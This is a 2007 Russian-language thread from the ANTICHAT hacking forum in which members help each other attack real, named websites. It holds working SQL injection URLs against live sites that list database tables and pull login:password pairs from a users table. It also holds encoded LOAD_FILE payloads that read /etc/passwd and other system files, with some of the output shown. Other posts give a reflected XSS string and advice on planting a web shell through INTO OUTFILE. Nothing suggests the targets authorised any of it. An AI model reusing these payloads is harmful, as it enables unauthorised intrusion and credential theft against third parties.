ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.09.2007, 16:12
|
|
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462
Репутация:
91
|
|
smroqt?lnb`kg ...
И еще неизвестно сколько будет дальше...
После 16го символа пошли одни нули.... Тоесть я > поменял на = так можно? Это значит что всего 16 символов?
smroqt?lnb`kgnrs
Вот что вышло, и что это такое я сбрутил? Куда это совать?)
И еще если я сбрутил из version() первые три символа 4-0 значит ли это что версия 4.0?
Последний раз редактировалось SUBJECT617; 27.09.2007 в 18:09..
|
|
|
29.09.2007, 17:51
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
Провел на форуме:
4778940
Репутация:
1257
|
|
вопросег. есть ли тут[http://www.lipetsk.ru/sites/catalogue.html?category=-1+union+select+1,2,3,4,5,6,7,8/*] SQl-ing ? и как раскрутить?
поля подбирал с помощью "order by". ошибку не показывает но догадоццо что она есть можна.
и ещё. если сделать так http://www.lipetsk.ru/sites/catalogue.html?category=-1+'><script>alert('XSS')</script><'
то будут пасив xss
|
|
|
|
30.09.2007, 08:45
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137
Репутация:
201
|
|
mr.The
Первый параметр выводится в href а-тега.
Чтобы каждый раз не искать результат в сурсе страницы, можно закрывать тег из самой инъекции.
Код:
http://www.lipetsk.ru/sites/catalogue.html?pass=1&backurl=/sites/catalogue.html&category=null+union+select+concat('\'>',table_schema,'.',table_name,'<a '),0,0,0,0,0,0,0+from+information_schema.tables/*
http://www.lipetsk.ru/sites/catalogue.html?pass=1&backurl=/sites/catalogue.html&category=null+union+select+concat('\'>',login,':',password,'<a '),0,0,0,0,0,0,0+from+www2.auth_users/*
|
|
|
|
30.09.2007, 14:26
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
Провел на форуме:
4778940
Репутация:
1257
|
|
V1k
пасиба!
|
|
|
|
30.09.2007, 15:25
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777
Репутация:
4
|
|
http://www.ksu.ru/f16/index.php?id=10&idm=0'&id_news=-1+union+select+1,2,3,4,database(),6,7,8,9,10,11/*
Выводит имя базы, пользователя и версию. Подобрать названия таблиц что-то не получается. Что можете посоветовать кроме XSS?
|
|
|
|
30.09.2007, 16:57
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
Да ничего не могу, единственное вот страница админа -
http://www.ksu.ru/archeol/ceramics/index.phtml?flag=1&k=0
попробуй подобрать что-нибудь... А так там ЛОАД_ФАЙЛ не работает, разве что попробуй шелл залить через into outfile, только надо подобрать хотябы одну таблицу, любую...
|
|
|
|
30.09.2007, 16:59
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
Провел на форуме:
142777
Репутация:
4
|
|
Да я сам пробовал лоад файл. Увы, не помогло. Спасибо за совет.
|
|
|
|
02.10.2007, 11:39
|
|
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157
Репутация:
247
|
|
Подскажите, что дальше делать?
http://www.nap.edu/topics.php?topic=350+union+select+1,2,3,4,5,6,7,8, 9,10,11
|
|
|
|
02.10.2007, 11:51
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(CHAR(46,46,47,46,46 ,47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7 ,8,9,10,11/*
Root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
и тд..
ftpusers
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(0x2f6574632f686f737 473),4,5,6,7,8,9,10,11/*
syslog.conf
http://www.nap.edu/topics.php?topic=-350+union+select+1,2,LOAD_FILE(0x2f6574632f7365727 669636573),4,5,6,7,8,9,10,11/*
Последний раз редактировалось halkfild; 02.10.2007 в 12:04..
|
|
|
|
02.10.2007, 12:16
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
тут на ачате полно статей о скулях и о лоад_файл
http://forum.antichat.ru/thread19844.html
http://forum.antichat.ru/showthread.php?p=407222#post407222
еще тут
http://injection.rulezz.ru/
а вообще поиск)))
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
